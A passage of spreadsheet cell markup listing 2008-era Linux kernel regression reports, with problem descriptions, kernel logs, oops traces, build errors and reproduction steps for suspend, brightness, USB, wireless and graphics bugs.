Xorg[6928]: segfault at 692 ip 00007fb391c5bb92 sp 00007fff99e6a6c0 error 4 in ld-2.7.so[7fb391c4e000+1d000] (ignore this bit, I think it happens every time X starts) [ 1541.686628] Xorg:6928 freeing invalid memtype d0020000-d002a000 [ 1541.686748] Xorg:6928 freeing invalid memtype d002a000-d0032000 [ 1541.686848] Xorg:6928 freeing invalid memtype d0032000-d0042000 [ 1541.686948] Xorg:6928 freeing invalid memtype d0042000-d0043000 [ 1541.687221] Xorg:6928 freeing invalid memtype d0100000-d0740000 [ 1541.687421] Xorg:6928 freeing invalid memtype d077f000-d1a00000 [ 1541.687549] Xorg:6928 freeing invalid memtype d1a00000-d2040000 [ 1541.687649] Xorg:6928 freeing invalid memtype d2040000-d2680000 [ 1541.687750] Xorg:6928 freeing invalid memtype d2680000-d4680000 [ 1542.116794] Xorg:6928 freeing invalid memtype d0000000-d0020000 [ 1542.343673] pidgin[7505] general protection ip:7fcfdab92c92 sp:7fffe4e46ca0 error:0 in libX11.so.6.2.0[7fcfdab52000+ff000] [ 1542.366374] update-notifier[7372] general protection ip:7f543a2acb92 sp:7fff424bc4a0 error:0 in ld-2.7.so[7f543a29f000+1d000] [ 1545.569879] skge eth2: disabling interface [ 1545.575729] skge eth2: enabling interface [ 1545.579087] ADDRCONF(NETDEV_UP): eth2: link is not ready [ 1546.966466] gedit[7423]: segfault at ffff88003740d448 ip 00007fb76a5d9053 sp 00007fff7ecf11d0 error 5 in libqt-mt.so.3.3.8[7fb76a1f8000+9df000] [ 1547.262323] skge eth2: Link is up at 100 Mbps, full duplex, flow control both [ 1547.262656] ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready [ 1547.831519] evince[7916] general protection ip:7f92c525b794 sp:7fffcd46a680 error:0 in ld-2.7.so[7f92c524d000+1d000] [ 1547.964072] python[7526]: segfault at 200515 ip 00007f98515237e3 sp 00007fff59737530 error 4 in ld-2.7.so[7f985151a000+1d000] [ 1549.013419] console-kit-dae[6506]: segfault at 28 ip 00007f310cf8b7c5 sp 00007fff1519ef40 error 4 in ld-2.7.so[7f310cf82000+1d000] [ 1557.926527] eth2: no IPv6 routers present [ 1568.747175] dcopserver[7325]: segfault at 4617998 ip 00007fbd85111409 sp 00007fff8e04c7e0 error 4 in libc-2.7.so[7fbd850dc000+158000] [ 1569.959891] eth2: no IPv6 routers present</t>
  </si>
  <si>
    <t>Disk errors sometimes ignored from the USB-SCSI layer</t>
  </si>
  <si>
    <t>Peter Fox</t>
  </si>
  <si>
    <t>2012-05-30 11:40 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknown Earliest failing kernel version: pre 2.6.19 Distribution: gentoo Hardware Environment: x86 Software Environment: Problem Description: I have a failing disk drive, and in one type of USB-IDE adaptor bad sectors are not being handled correctly. This is probably becasue the USB-IDE converter doesn't seem to report errors from reading bad sectors in the "proper" way, but it does give plenty of evidence that something is wrong and that the sector cannot be read. Alan Stern gave a nice summary here: http://marc.info/?l=linux-scsi&amp;m=122903295704381&amp;w=2 Various recent kernels seem to do different things when attempting to read the bad disk: - 2.6.26 read the whole disk without reporting errors - 2.6.27 gets in a very long (or possibly infinite) loop - 2.6.28 gets a bit stuck on the bad sectors, taking several minutes to timeout, and still does not report error Steps to reproduce: Attempt to read bad sectors from a disk drive via a newlink IDE/SATA to USB disk adaptor.</t>
  </si>
  <si>
    <t>S3 resume regression since 2.6.27.2</t>
  </si>
  <si>
    <t>2.6.27.2 through 2.6.27.9</t>
  </si>
  <si>
    <t>2008-12-17 18:16 UTC</t>
  </si>
  <si>
    <t>Dale Blount</t>
  </si>
  <si>
    <t>2008-12-28 05:43 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.1 Earliest failing kernel version: 2.6.27.2 Distribution: Arch Linux Hardware Environment: MSI 7025 (K8N NEO2) Software Environment: Arch Linux Current (up to date) Problem Description: As of 2.6.27.1 my system no longer wakes up from resume. I've unloaded all possible modules (other than required, ext3, usb for keyboard, etc) with no better luck. I've turned on PM_TRACE but get no hash matches after reboot. I built and installed a kernel by hand because the distro kernel (mostly stock) was failing. Same results. Revert back to 2.6.27.1 and it works again. Steps to reproduce: 1) Unload all possible modules. 2) echo 1 &gt; /sys/power/pm_trace 3) echo mem &gt; /sys/power/state (I've also tried hibernate-script and s2ram with the same results). On power on, there is no video. My RTC hasn't changed (ntp* is disabled also) so I'm guessing this is why the hash matches from PM_TRACE doesn't hit anything.</t>
  </si>
  <si>
    <t>Dan Dart</t>
  </si>
  <si>
    <t>Lenovo ThinkPad SL series: LCD brightness works in procfs, buggy in sysfs</t>
  </si>
  <si>
    <t>2008-12-18 12:47 UTC</t>
  </si>
  <si>
    <t>Alexandre Rostovtsev</t>
  </si>
  <si>
    <t>2009-04-28 15:52 UTC</t>
  </si>
  <si>
    <t>12037 12235</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: 2.6.27 Distribution: Gentoo Hardware Environment: Lenovo ThinkPad SL300, Intel G45 video Software Environment: Problem Description: Reversed order of brightness levels is fixed by applying patch and DSDT in bug #12037 but several more problems with LCD brightness remain. Problem 1: brightness controls in /proc and /sys are inconsistent. First, /sys/class/backlight/acpi_video0/actual_brightness always reads 0, no matter what the actual brightness is. /sys/class/backlight/acpi_video0/brightness *sometimes* displays the correct brightness value. /proc/acpi/video/VGA/LCDD/brightness is always correct. Second, setting the brightness via procfs always works (but the change is never reflected in sysfs). Setting the brightness in sysfs to any value different from what sysfs thinks it currently is always works (and is immediately reflected in procfs). Setting the brightness in sysfs to a value equal to what it thinks the brightness is (but different from what it actually is) has no effect. Here is a sequence of commands to illustrate this issue: # # Start: LCD is at 100% brightness # cat /proc/acpi/video/VGA/LCDD/brightness levels: 100 80 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 100 current: 100 # cat /sys/class/backlight/acpi_video0/brightness 15 # # 15 is the max increment, 0 is lowest # echo 50 &gt; /proc/acpi/video/VGA/LCDD/brightness # # LCD is at 50% brightness # cat /proc/acpi/video/VGA/LCDD/brightness | grep current current: 50 # cat /sys/class/backlight/acpi_video0/brightness 15 # # sysfs is lying # echo 15 &gt; /sys/class/backlight/acpi_video0/brightness # # nothing happens # cat /proc/acpi/video/VGA/LCDD/brightness | grep current current: 50 # echo 70 &gt; /proc/acpi/video/VGA/LCDD/brightness # # screen goes to 70% brightness # cat /proc/acpi/video/VGA/LCDD/brightness | grep current current: 70 # cat /sys/class/backlight/acpi_video0/brightness 15 # echo 3 &gt; /sys/class/backlight/acpi_video0/brightness # # screen goes to 35% brightness # cat /proc/acpi/video/VGA/LCDD/brightness | grep current current: 90 # cat /sys/class/backlight/acpi_video0/brightness 3 # echo 15 &gt; /sys/class/backlight/acpi_video0/brightness # # screen goes back to 100% brightness # cat /proc/acpi/video/VGA/LCDD/brightness | grep current current: 100 Problem 2: in Gnome, incrementing brightness above the maximum (with the keyboard shortcut) results in 25% brightness. When the screen turns on after going off due to power saving, the brightness is also at 25%, no matter where it was originally. Using keyboard shortcuts, the only way to bring it back to 100% is to decrement brightness one step and then increment it one step. I suspect this is also caused by sysfs brightness file's buggy behavior.</t>
  </si>
  <si>
    <t>new oops on resume due to ACPI_PREEMPTION_POINT()</t>
  </si>
  <si>
    <t>2008-12-18 18:17 UTC</t>
  </si>
  <si>
    <t>2008-12-29 19:26 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc8 Distribution: FC10 Hardware Environment: Lenovo T61 Problem Description: suspend to ram resume look at dmesg BUG: sleeping function called from invalid context at kernel/sched.c:5571 in_atomic(): 0, irqs_disabled(): 1, pid: 3880, name: bash Pid: 3880, comm: bash Not tainted 2.6.28-rc8-09690-g55dac3a-dirty #70 Call Trace: [&lt;ffffffff8022c0e4&gt;] __might_sleep+0xcf/0xd1 [&lt;ffffffff8023351b&gt;] __cond_resched+0x15/0x54 [&lt;ffffffff80588477&gt;] _cond_resched+0x2d/0x38 [&lt;ffffffff803a9f41&gt;] acpi_ps_complete_op+0x26d/0x283 [&lt;ffffffff803b1448&gt;] ? acpi_ut_create_generic_state+0x31/0x4e [&lt;ffffffff803aa708&gt;] acpi_ps_parse_loop+0x7b1/0x941 [&lt;ffffffff803a9789&gt;] acpi_ps_parse_aml+0xee/0x3c0 [&lt;ffffffff803aaf93&gt;] acpi_ps_execute_method+0x18a/0x293 [&lt;ffffffff803a62d8&gt;] acpi_ns_evaluate+0x1e4/0x33c [&lt;ffffffff803ac576&gt;] acpi_rs_set_srs_method_data+0xdb/0xfd [&lt;ffffffff803ac069&gt;] acpi_set_current_resources+0x37/0x45 [&lt;ffffffff803b8999&gt;] acpi_pci_link_set+0x129/0x23d [&lt;ffffffff8024c1aa&gt;] ? retrigger_next_event+0xb4/0xbf [&lt;ffffffff803b8b4b&gt;] irqrouter_resume+0x9e/0xb6 [&lt;ffffffff803e8bc0&gt;] __sysdev_resume+0x1f/0x50 [&lt;ffffffff803e8cee&gt;] sysdev_resume+0xfd/0x143 [&lt;ffffffff803eece8&gt;] device_power_up+0x10/0x1b [&lt;ffffffff8025bee7&gt;] suspend_devices_and_enter+0x12a/0x1b3 [&lt;ffffffff8025c199&gt;] enter_state+0x200/0x290 [&lt;ffffffff8025c2e0&gt;] state_store+0xb7/0xd8 [&lt;ffffffff8037186b&gt;] kobj_attr_store+0x17/0x19 [&lt;ffffffff802d8945&gt;] sysfs_write_file+0xdf/0x114 [&lt;ffffffff80294e5d&gt;] vfs_write+0xae/0x137 [&lt;ffffffff80294faa&gt;] sys_write+0x47/0x70 [&lt;ffffffff8020b3db&gt;] system_call_fastpath+0x16/0x1b commit 8bd108d14604d9c95000751e6c6ecbd11ea6ed40 Author: Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Date: Thu Sep 25 21:40:30 2008 +0400 ACPICA: add preemption point after each opcode parse Reference: http://marc.info/?l=linux-acpi&amp;m=122236382701062&amp;w=2</t>
  </si>
  <si>
    <t>Regression due to commit 2b80848e3818fb1c (p54usb: support LM87 firmwares)</t>
  </si>
  <si>
    <t>v2.6.28-rc9</t>
  </si>
  <si>
    <t>2008-12-20 10:45 UTC</t>
  </si>
  <si>
    <t>2009-01-20 14:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.27 Earliest failing kernel version: v2.6.28-rc1 Distribution: openSUSE 11.1 Hardware Environment: HP dv2815nv laptop Software Environment: x86_64 Problem Description: When using LM87 firmware, the p54usb device stalls for certain message lengths because the firmware needs an explicit termination packet. The fix is the following patch from Christian Lamparter &lt;chunkeey@web.de&gt;: Index: linux-2.6/drivers/net/wireless/p54/p54usb.c =================================================================== --- linux-2.6.orig/drivers/net/wireless/p54/p54usb.c +++ linux-2.6/drivers/net/wireless/p54/p54usb.c @@ -251,6 +251,7 @@ static void p54u_tx_lm87(struct ieee8021 usb_sndbulkpipe(priv-&gt;udev, P54U_PIPE_DATA), hdr, len + sizeof(*hdr), free_on_tx ? p54u_tx_free_cb : p54u_tx_cb, dev); + data_urb-&gt;transfer_flags |= URB_ZERO_PACKET; usb_submit_urb(data_urb, GFP_ATOMIC); } Steps to reproduce: Do a variable length ping with the packetsize set to 368, 880, or 1392.</t>
  </si>
  <si>
    <t>kernel panics with net_rx_action on kernels above 2.6.26</t>
  </si>
  <si>
    <t>&gt; 2.6.26</t>
  </si>
  <si>
    <t>2008-12-20 15:06 UTC</t>
  </si>
  <si>
    <t>2008-12-22 12:25 UTC</t>
  </si>
  <si>
    <t>Subject : kernel panics with net_rx_action on kernels above 2.6.26 Submitter : Alexander Huemer &lt;alexander.huemer@sbg.ac.at&gt; Date : 2008-12-13 18:43 References : http://marc.info/?l=linux-kernel&amp;m=122919424932016&amp;w=4 Handled-By : Jarek Poplawski &lt;jarkao2@gmail.com&gt; Patch : http://marc.info/?l=linux-net&amp;m=122934825227768&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Orinoco (Mac airport) oops when loading agere_sta_fw.bin firware</t>
  </si>
  <si>
    <t>2.6.28-rc9-git1</t>
  </si>
  <si>
    <t>2008-12-20 15:13 UTC</t>
  </si>
  <si>
    <t>Olivier Guerrier</t>
  </si>
  <si>
    <t>2009-06-18 02:10 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.28-rc1 Distribution: Debian lenny Hardware Environment: mac iBook 2.2 Software Environment: Debian lenny ppc Problem Description: According to http://wireless.kernel.org/en/users/Drivers/orinoco WPA support was added in 2.6.28-rc1, my hardware platform seems to be listed in http://wireless.kernel.org/en/users/Drivers/orinoco/devices "The airport driver supports the AirPort in the Apple Powerbook G3 (Firewire)". But trying to boot (or load the module later) _with the firmware in place_ lead to kernel oops. Steps to reproduce: - put the firmware in /lib/firmware/agere_sta_fw.bin - unload airport module - unload orinoco module - load orinoco module - load airport module - Kernel oops here I'm available for testing upon request, just ask. Kernel output: [ 854.288449] orinoco 0.15 (David Gibson &lt;hermes@gibson.dropbear.id.au&gt;, Pavel Roskin &lt;proski@gnu.org&gt;, et al) [ 868.047275] airport 0.15 (Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt;) [ 868.047377] airport: Physical address 80030000 [ 869.249712] eth1: Hardware identity 0005:0001:0001:0002 [ 869.249834] eth1: Station identity 001f:0001:0008:0046 [ 869.249844] eth1: Firmware determined as Lucent/Agere 8.70 [ 869.249859] eth1: Attempting to download firmware agere_sta_fw.bin [ 869.249881] hermes_dld: AUX enable returned 0 [ 869.249881] hermes_dld: AUX enable returned 0 [ 869.250627] hermes_dld: AUX disable returned 0 [ 869.250633] hermes_dld: Actual PDA length 998, Max allowed 1000 [ 869.250639] eth1: Read PDA returned 0 [ 869.250648] airport 0.00030000:radio: firmware: requesting agere_sta_fw.bin [ 869.325099] hermes_dld: AUX enable returned 0 [ 869.325112] hermes_dld: Enabling volatile, EP 0x0f80c200 [ 869.327412] hermes_dld: PROGRAM_ENABLE returned 0 [ 869.327419] eth1: Program init returned 0 [ 869.327427] hermes_dld: Programming block of length 67 to address 0x01696377 [ 869.327458] hermes_dld: Programming block of length 48835 to address 0x66006070 [ 869.345270] eth1: Program returned 0 [ 869.345323] Unable to handle kernel paging request for data at address 0xa6a45230 [ 869.350854] Faulting instruction address: 0xe985439c [ 869.356266] Oops: Kernel access of bad area, sig: 11 [#1] [ 869.361590] PowerMac [ 869.366718] Modules linked in: airport(+) orinoco tun ipv6 ext2 snd_powermac cpufreq_userspace sbp2 scsi_mod loop snd_aoa_i2sbus snd_pcm snd_page_alloc snd_seq snd_timer snd_seq_device snd hermes_dld hermes soundcore snd_aoa_soundbus uninorth_agp agpgart evdev ext3 jbd mbcache dm_mirror dm_region_hash dm_log dm_snapshot dm_mod ide_cd_mod cdrom ohci1394 sungem sungem_phy ieee1394 i2c_powermac [last unloaded: orinoco] [ 869.390424] NIP: e985439c LR: e9ce3cac CTR: 00000001 [ 869.396511] REGS: e684baf0 TRAP: 0300 Not tainted (2.6.28-rc9-git1) [ 869.402674] MSR: 00009032 &lt;EE,ME,IR,DR&gt; CR: 24000488 XER: 20000000 [ 869.409030] DAR: a6a45230, DSISR: 40000000 [ 869.415329] TASK = e62b51b0[2312] 'modprobe' THREAD: e684a000 [ 869.415506] GPR00: e9ce3cac e684bba0 e62b51b0 e636f4ac a6a45230 e61c9400 00000003 00000000 [ 869.422074] GPR08: 00004a67 e9850000 0012c3bc 00003000 243ae7eb 10020390 e985500c 0000003a [ 869.428780] GPR16: 0000003c 0000003e e9854dee e9854de8 e9854e0e e9854dda e9854dd2 a6a45620 [ 869.435583] GPR24: e61c9404 e9854dc4 e636f4ac a6a45230 e636f000 e636f3c0 e9e14000 00000000 [ 869.449223] NIP [e985439c] hermes_apply_pda_with_defaults+0x218/0x24c [hermes_dld] [ 869.456339] LR [e9ce3cac] orinoco_download+0x1c8/0x35c [orinoco] [ 869.463499] Call Trace: [ 869.470608] [e684bba0] [e636f3c0] 0xe636f3c0 (unreliable) [ 869.477859] [e684bbf0] [e9ce3cac] orinoco_download+0x1c8/0x35c [orinoco] [ 869.485208] [e684bc20] [e9ce4374] orinoco_init+0x70/0x6bc [orinoco] [ 869.492577] [e684bc80] [c0256dd0] register_netdevice+0xb0/0x41c [ 869.499973] [e684bc90] [c0257184] register_netdev+0x48/0x68 [ 869.507346] [e684bca0] [e9cf759c] airport_attach+0x1a8/0x1fc [airport] [ 869.514686] [e684bcc0] [c01fee7c] macio_device_probe+0x64/0x8c [ 869.521928] [e684bce0] [c01f5360] driver_probe_device+0xe4/0x1ac [ 869.529150] [e684bd00] [c01f5498] __driver_attach+0x70/0xa4 [ 869.536404] [e684bd20] [c01f4b08] bus_for_each_dev+0x58/0xa4 [ 869.543685] [e684bd50] [c01f5164] driver_attach+0x24/0x34 [ 869.550963] [e684bd60] [c01f4364] bus_add_driver+0xb4/0x228 [ 869.558264] [e684bd80] [c01f5718] driver_register+0xc0/0x164 [ 869.565574] [e684bda0] [c01fed44] macio_register_driver+0x28/0x38 [ 869.572921] [e684bdb0] [e9cfc02c] init_airport+0x2c/0x60 [airport] [ 869.580231] [e684bdc0] [c0003cd8] do_one_initcall+0x50/0x184 [ 869.587466] [e684bf20] [c006284c] sys_init_module+0xac/0x1a8 [ 869.594621] [e684bf40] [c00146f0] ret_from_syscall+0x0/0x40 [ 869.601724] --- Exception: c01 at 0xff630d4 [ 869.601727] LR = 0x10003c80 [ 869.615793] Instruction dump: [ 869.622754] 5005442e 54a5043e 801a0000 7e231830 38a5ffff 54a5083c 7c601a14 54a5f87e [ 869.629971] 48000995 3b7b000c 7f9bb800 419e0020 &lt;801b0000&gt; 541f463e 501fc42e 501f421e [ 869.637301] ---[ end trace ef379da95c87dabe ]---</t>
  </si>
  <si>
    <t>i915: switching from kwin in opengl mode to a VT then back to x11, x11 freezes</t>
  </si>
  <si>
    <t>2008-12-20 15:44 UTC</t>
  </si>
  <si>
    <t>2009-02-08 05:15 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc8 intel i915 video bug? Submitter : "Caleb Cushing" &lt;xenoterracide@gmail.com&gt; Date : 2008-12-16 11:40 References : http://marc.info/?l=linux-kernel&amp;m=122942777030666&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>FPU emulation broken in 2.6.28-rc8 ?</t>
  </si>
  <si>
    <t>2008-12-20 15:48 UTC</t>
  </si>
  <si>
    <t>2009-02-17 14:49 UTC</t>
  </si>
  <si>
    <t>Subject : FPU emulation broken in 2.6.28-rc8 ? Submitter : Rogier Wolff &lt;R.E.Wolff@bitwizard.nl&gt; Date : 2008-12-17 8:56 References : http://marc.info/?l=linux-kernel&amp;m=122950463030747&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: ioremap on starting X with intel driver and multi-display</t>
  </si>
  <si>
    <t>2.6.28-rc9</t>
  </si>
  <si>
    <t>2008-12-21 04:53 UTC</t>
  </si>
  <si>
    <t>2009-01-09 15:06 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Latest failing kernel version: 2.6.28-rc9 Distribution: Ubuntu Hardware Environment: Acer Extensa 5220 Software Environment: Xorg 7.4~5ubuntu3 Problem Description: When I start X, this error appears in dmesg. X usually crashes sometime later then. For my logs see http://bugs.freedesktop.org/show_bug.cgi?id=18496 for other reports http://kerneloops.org/search.php?filter=2.6.28-rc8-git1&amp;search=__ioremap_caller The warning looks like this: [28556.214595] WARNING: at arch/x86/mm/ioremap.c:226 __ioremap_caller+0x331/0x380() [28556.214598] Modules linked in: i915 rfkill_input sbs sbshc fan vfat fat ext2 fuse pwc snd_usb_audio snd_usb_lib compat_ioctl32 videodev v4l1_compat snd_hwdep pcmcia arc4 ecb b43 mac80211 cfg80211 input_polldev snd_hda_intel snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss psmouse serio_raw snd_seq_midi sg snd_rawmidi snd_seq_midi_event sr_mod usbhid hid dvb_usb_dtt200u dvb_usb dvb_core ati_remote cdrom snd_seq snd_timer snd_seq_device tifm_7xx1 tifm_core yenta_socket rsrc_nonstatic nsc_ircc snd soundcore ssbsnd_page_alloc irda uhci_hcd ac crc_ccitt battery video thermal button acer_wmi rfkill led_class evdev wmi [28556.214641] Pid: 25199, comm: Xorg Tainted: G W 2.6.28-rc9 #80 [28556.214643] Call Trace: [28556.214650] [&lt;ffffffff81039baf&gt;] warn_on_slowpath+0x5f/0x90 [28556.214654] [&lt;ffffffff8102927c&gt;] ? change_page_attr_set_clr+0xdc/0x380 [28556.214657] [&lt;ffffffff810297c2&gt;] ? _set_memory_uc+0x22/0x30 [28556.214660] [&lt;ffffffff81027f5d&gt;] ? ioremap_change_attr+0x2d/0x50 [28556.214663] [&lt;ffffffff810282b1&gt;] __ioremap_caller+0x331/0x380 [28556.214673] [&lt;ffffffffa036bcd8&gt;] ? i915_gem_entervt_ioctl+0x2b8/0x5a0 [i915] [28556.214676] [&lt;ffffffff81028446&gt;] ioremap_wc+0x26/0x30 [28556.214682] [&lt;ffffffffa036bcd8&gt;] i915_gem_entervt_ioctl+0x2b8/0x5a0 [i915] [28556.214686] [&lt;ffffffff81201b8a&gt;] drm_ioctl+0x10a/0x320 [28556.214693] [&lt;ffffffffa003b6bc&gt;] ? acpi_video_get_brightness+0x2f/0x7a [video] [28556.214699] [&lt;ffffffffa036ba20&gt;] ? i915_gem_entervt_ioctl+0x0/0x5a0 [i915] [28556.214703] [&lt;ffffffff810c2a4d&gt;] vfs_ioctl+0x7d/0xa0 [28556.214705] [&lt;ffffffff810c2ae4&gt;] do_vfs_ioctl+0x74/0x480 [28556.214709] [&lt;ffffffff810ce440&gt;] ? mntput_no_expire+0x20/0x170 [28556.214712] [&lt;ffffffff810b4740&gt;] ? __fput+0x180/0x200 [28556.214714] [&lt;ffffffff810c2f89&gt;] sys_ioctl+0x99/0xa0 [28556.214718] [&lt;ffffffff8100c38b&gt;] system_call_fastpath+0x16/0x1b [28556.214720] ---[ end trace a6d99db49965d955 ]---</t>
  </si>
  <si>
    <t>Almost all my devices are not recongnized by  kernel-2.6.27, 2.6-28</t>
  </si>
  <si>
    <t>2.6.27 and 2.6.28</t>
  </si>
  <si>
    <t>2008-12-22 01:20 UTC</t>
  </si>
  <si>
    <t>paul</t>
  </si>
  <si>
    <t>2009-06-23 01:40 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:kernel 2.6.24 Earliest failing kernel version: kernel 2.6.27 Distribution: Mandriva Hardware Environment: Atlon AMD 1800+, Software Environment: KDE Problem Description: As said in the summary, with kernel 2-6-27 and 2-6-28 (thos ones are availables in mandriva repositories), all my devices are not recognized by the kernel. So, I have no printers, no internet, no webcam..... With kernel 2-6-24, everything is fine. The bug is not due to patched mandriva kernel since I used a pure linux version kernel. Steps to reproduce:Just boot the kernel</t>
  </si>
  <si>
    <t>FN-Fx for volume not working on Eee 901</t>
  </si>
  <si>
    <t>2.6.28-rc9 (latest from GIT as of 21:39:50 GMT)</t>
  </si>
  <si>
    <t>2008-12-22 13:49 UTC</t>
  </si>
  <si>
    <t>Patrick Bregman</t>
  </si>
  <si>
    <t>Latest working kernel version: Don't know, probably 2.6.27 Earliest failing kernel version: Not sure, guess 2.6.28-rc3 (my first RC kernel) Distribution: Slackware Linux 12.x Hardware Environment: - Asus EEE PC 901, 12GB (Windows version) - - Atheros 802.11n WiFi card, supported by ath9k - - New 32GB secondary SSD Software Environment: Slackware Linux 12.1/12.2, latest updates Problem Description: On my Eee PC 901 the keys to change the volume do not work since I switched to the 2.6.28-rc kernel. The first time I noticed this was with kernel 2.6.28-rc3. Before this, I compiled my own 2.6.27 kernel in which it worked just fine. When I heard about the 1 second boot time of the 2.6.28 kernel, I switched to compiling this kernel out of the GIT tree. I have been doing so since 2.6.28-rc3. The FN-Fx buttons seemed to work (brightness up/down and sleep), but when I tried the volume keys, it did nothing. I kept using the same acpid (version 1.0.8) and the same ACPI scripts. Steps to reproduce: 1. Compile a 2.6.28 kernel from GIT 1b. Install/reboot 2. Press FN-F7, FN-F8 or FN-F9 while watching alsamixer Linked files: 2.6.28-rc9 config: http://www.patrickbregman.eu/config-2.6.28-rc9-901 My kernel: http://www.patrickbregman.eu/vmlinuz-2.6.28-rc9-901</t>
  </si>
  <si>
    <t>David Roka</t>
  </si>
  <si>
    <t>[Patch] tc1100-wmi: sysfs entries always 0</t>
  </si>
  <si>
    <t>2008-12-24 17:44 UTC</t>
  </si>
  <si>
    <t>Krzysztof Kosiński</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22 Earliest failing kernel version: 2.6.25 Distribution: Ubuntu Problem Description: The tc1100-wmi driver should print the current states of wireless LAN and jogdial brightness control when "cat /sys/devices/platform/tc1100-wmi/wireless" and "cat /sys/devices/platform/tc1100-wmi/jogdial" are executed, respectively. What actually happens is that both of those commands print 0 regardless of the hardware state. The cause is that wmi_query_block returns an ACPI_TYPE_INTEGER rather than ACPI_TYPE_BUFFER as the driver assumes. Additionally, the driver intends to return a jogdial state that is inverted with respect to the commands required to set it (e.g. it intends to return 1 after the jogdial file was written with 0).</t>
  </si>
  <si>
    <t>Build fails on alpha architecture (pci_ioremap)</t>
  </si>
  <si>
    <t>2.6.28-rc*, 2.6.28</t>
  </si>
  <si>
    <t>2008-12-25 02:40 UTC</t>
  </si>
  <si>
    <t>2009-01-11 04:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.10 Earliest failing kernel version: 2.6.28-rc1 Distribution: Gentoo Hardware Environment: ES40, XP1000 Software Environment: gcc version 4.2.4 Normal config using "zcat /proc/config.gz &gt; .config &amp;&amp; make oldconfig", then "make all": $ make all scripts/kconfig/conf -s arch/alpha/Kconfig CHK include/linux/version.h UPD include/linux/version.h CHK include/linux/utsrelease.h UPD include/linux/utsrelease.h SYMLINK include/asm -&gt; include/asm-alpha CC kernel/bounds.s GEN include/linux/bounds.h CC arch/alpha/kernel/asm-offsets.s In file included from /home/klausman/src/linux-2.6.28-rc1/arch/alpha/include/asm/core_tsunami.h:5, from /home/klausman/src/linux-2.6.28-rc1/arch/alpha/include/asm/io.h:232, from arch/alpha/kernel/asm-offsets.c:12: include/linux/pci.h: In function 'pci_ioremap_bar': include/linux/pci.h:1148: error: implicit declaration of function 'ioremap_nocache' include/linux/pci.h:1149: warning: return makes pointer from integer without a cast In file included from arch/alpha/kernel/asm-offsets.c:12: /home/klausman/src/linux-2.6.28-rc1/arch/alpha/include/asm/io.h: At top level: /home/klausman/src/linux-2.6.28-rc1/arch/alpha/include/asm/io.h:300: error: conflicting types for 'ioremap_nocache' include/linux/pci.h:1148: error: previous implicit declaration of 'ioremap_nocache' was here make[1]: *** [arch/alpha/kernel/asm-offsets.s] Error 1 make: *** [prepare0] Error 2 Snippet is from -rc1 but .28 fails in the very same way (and all rc's did, too).</t>
  </si>
  <si>
    <t>Fingerprint reader doesn't respod after the first use</t>
  </si>
  <si>
    <t>&gt;2.6.28-rc8-git4</t>
  </si>
  <si>
    <t>2008-12-26 01:41 UTC</t>
  </si>
  <si>
    <t>2009-02-05 16:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28-rc8-00067-g9a9fafb Earliest failing kernel version: Distribution: Gentoo Hardware Environment: HP 2510p, aes2501 fprint reader Software Environment: Problem Description: The fingerprint reader doesn't respod after the first use, until I reload the 'ehci-hci' module. After some bisecting I think the problem is in the '24c0996a6b73e2554104961afcc8659534503e0d' commit. Steps to reproduce: I use the fingerprint reader</t>
  </si>
  <si>
    <t>Backward brigthess level</t>
  </si>
  <si>
    <t>2008-12-26 01:44 UTC</t>
  </si>
  <si>
    <t>2009-04-07 03:02 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.10 Earliest failing kernel version: 2.6.28 Distribution: all Hardware Environment: Notebook asus X51L Software Environment: all Problem Description:backward brigthess level Steps to reproduce: start Kpowersave and select brigthess level Asus X51L backward brigthess trouble. /proc/acpi/video/VGA/LCDD/brightness - work fine 0-min 15-max /sys/class/backlight/acpi_video0/brightness - trouble 0-max 15-min Kpowersave work bad - 100%-min 1%-max In dmesg: Dec 25 23:47:08 sfstudio kernel: ACPI: Please implement acpi_video_bus_ROM_seq_show Dec 26 01:34:14 sfstudio kernel: asus-laptop: Asus Laptop Support version 0.42 Dec 26 01:34:14 sfstudio kernel: asus-laptop: X51L model detected Dec 26 01:34:14 sfstudio kernel: asus-laptop: Brightness ignored, must be controlled by ACPI video driver Dec 26 01:34:14 sfstudio kernel: Registered led device: asus::mail Dec 26 01:37:29 sfstudio kernel: asus-laptop: Asus Laptop Support version 0.42 Dec 26 01:37:29 sfstudio kernel: asus-laptop: X51L model detected Dec 26 01:37:29 sfstudio kernel: asus-laptop: Brightness ignored, must be controlled by ACPI video driver Dec 26 01:37:29 sfstudio kernel: Registered led device: asus::mail Dec 26 01:39:20 sfstudio kernel: asus-laptop: Asus Laptop Support version 0.42 Dec 26 01:39:20 sfstudio kernel: asus-laptop: X51L model detected Dec 26 01:39:20 sfstudio kernel: asus-laptop: Brightness ignored, must be controlled by ACPI video driver Dec 26 01:39:20 sfstudio kernel: Registered led device: asus::mail Dec 26 01:40:31 sfstudio kernel: asus-laptop: Asus Laptop Support version 0.42 Dec 26 01:40:31 sfstudio kernel: asus-laptop: X51L model detected Dec 26 01:40:31 sfstudio kernel: asus-laptop: Brightness ignored, must be controlled by ACPI video driver Dec 26 01:40:31 sfstudio kernel: Registered led device: asus::mail Kernel: [root@sfstudio kernel]# uname 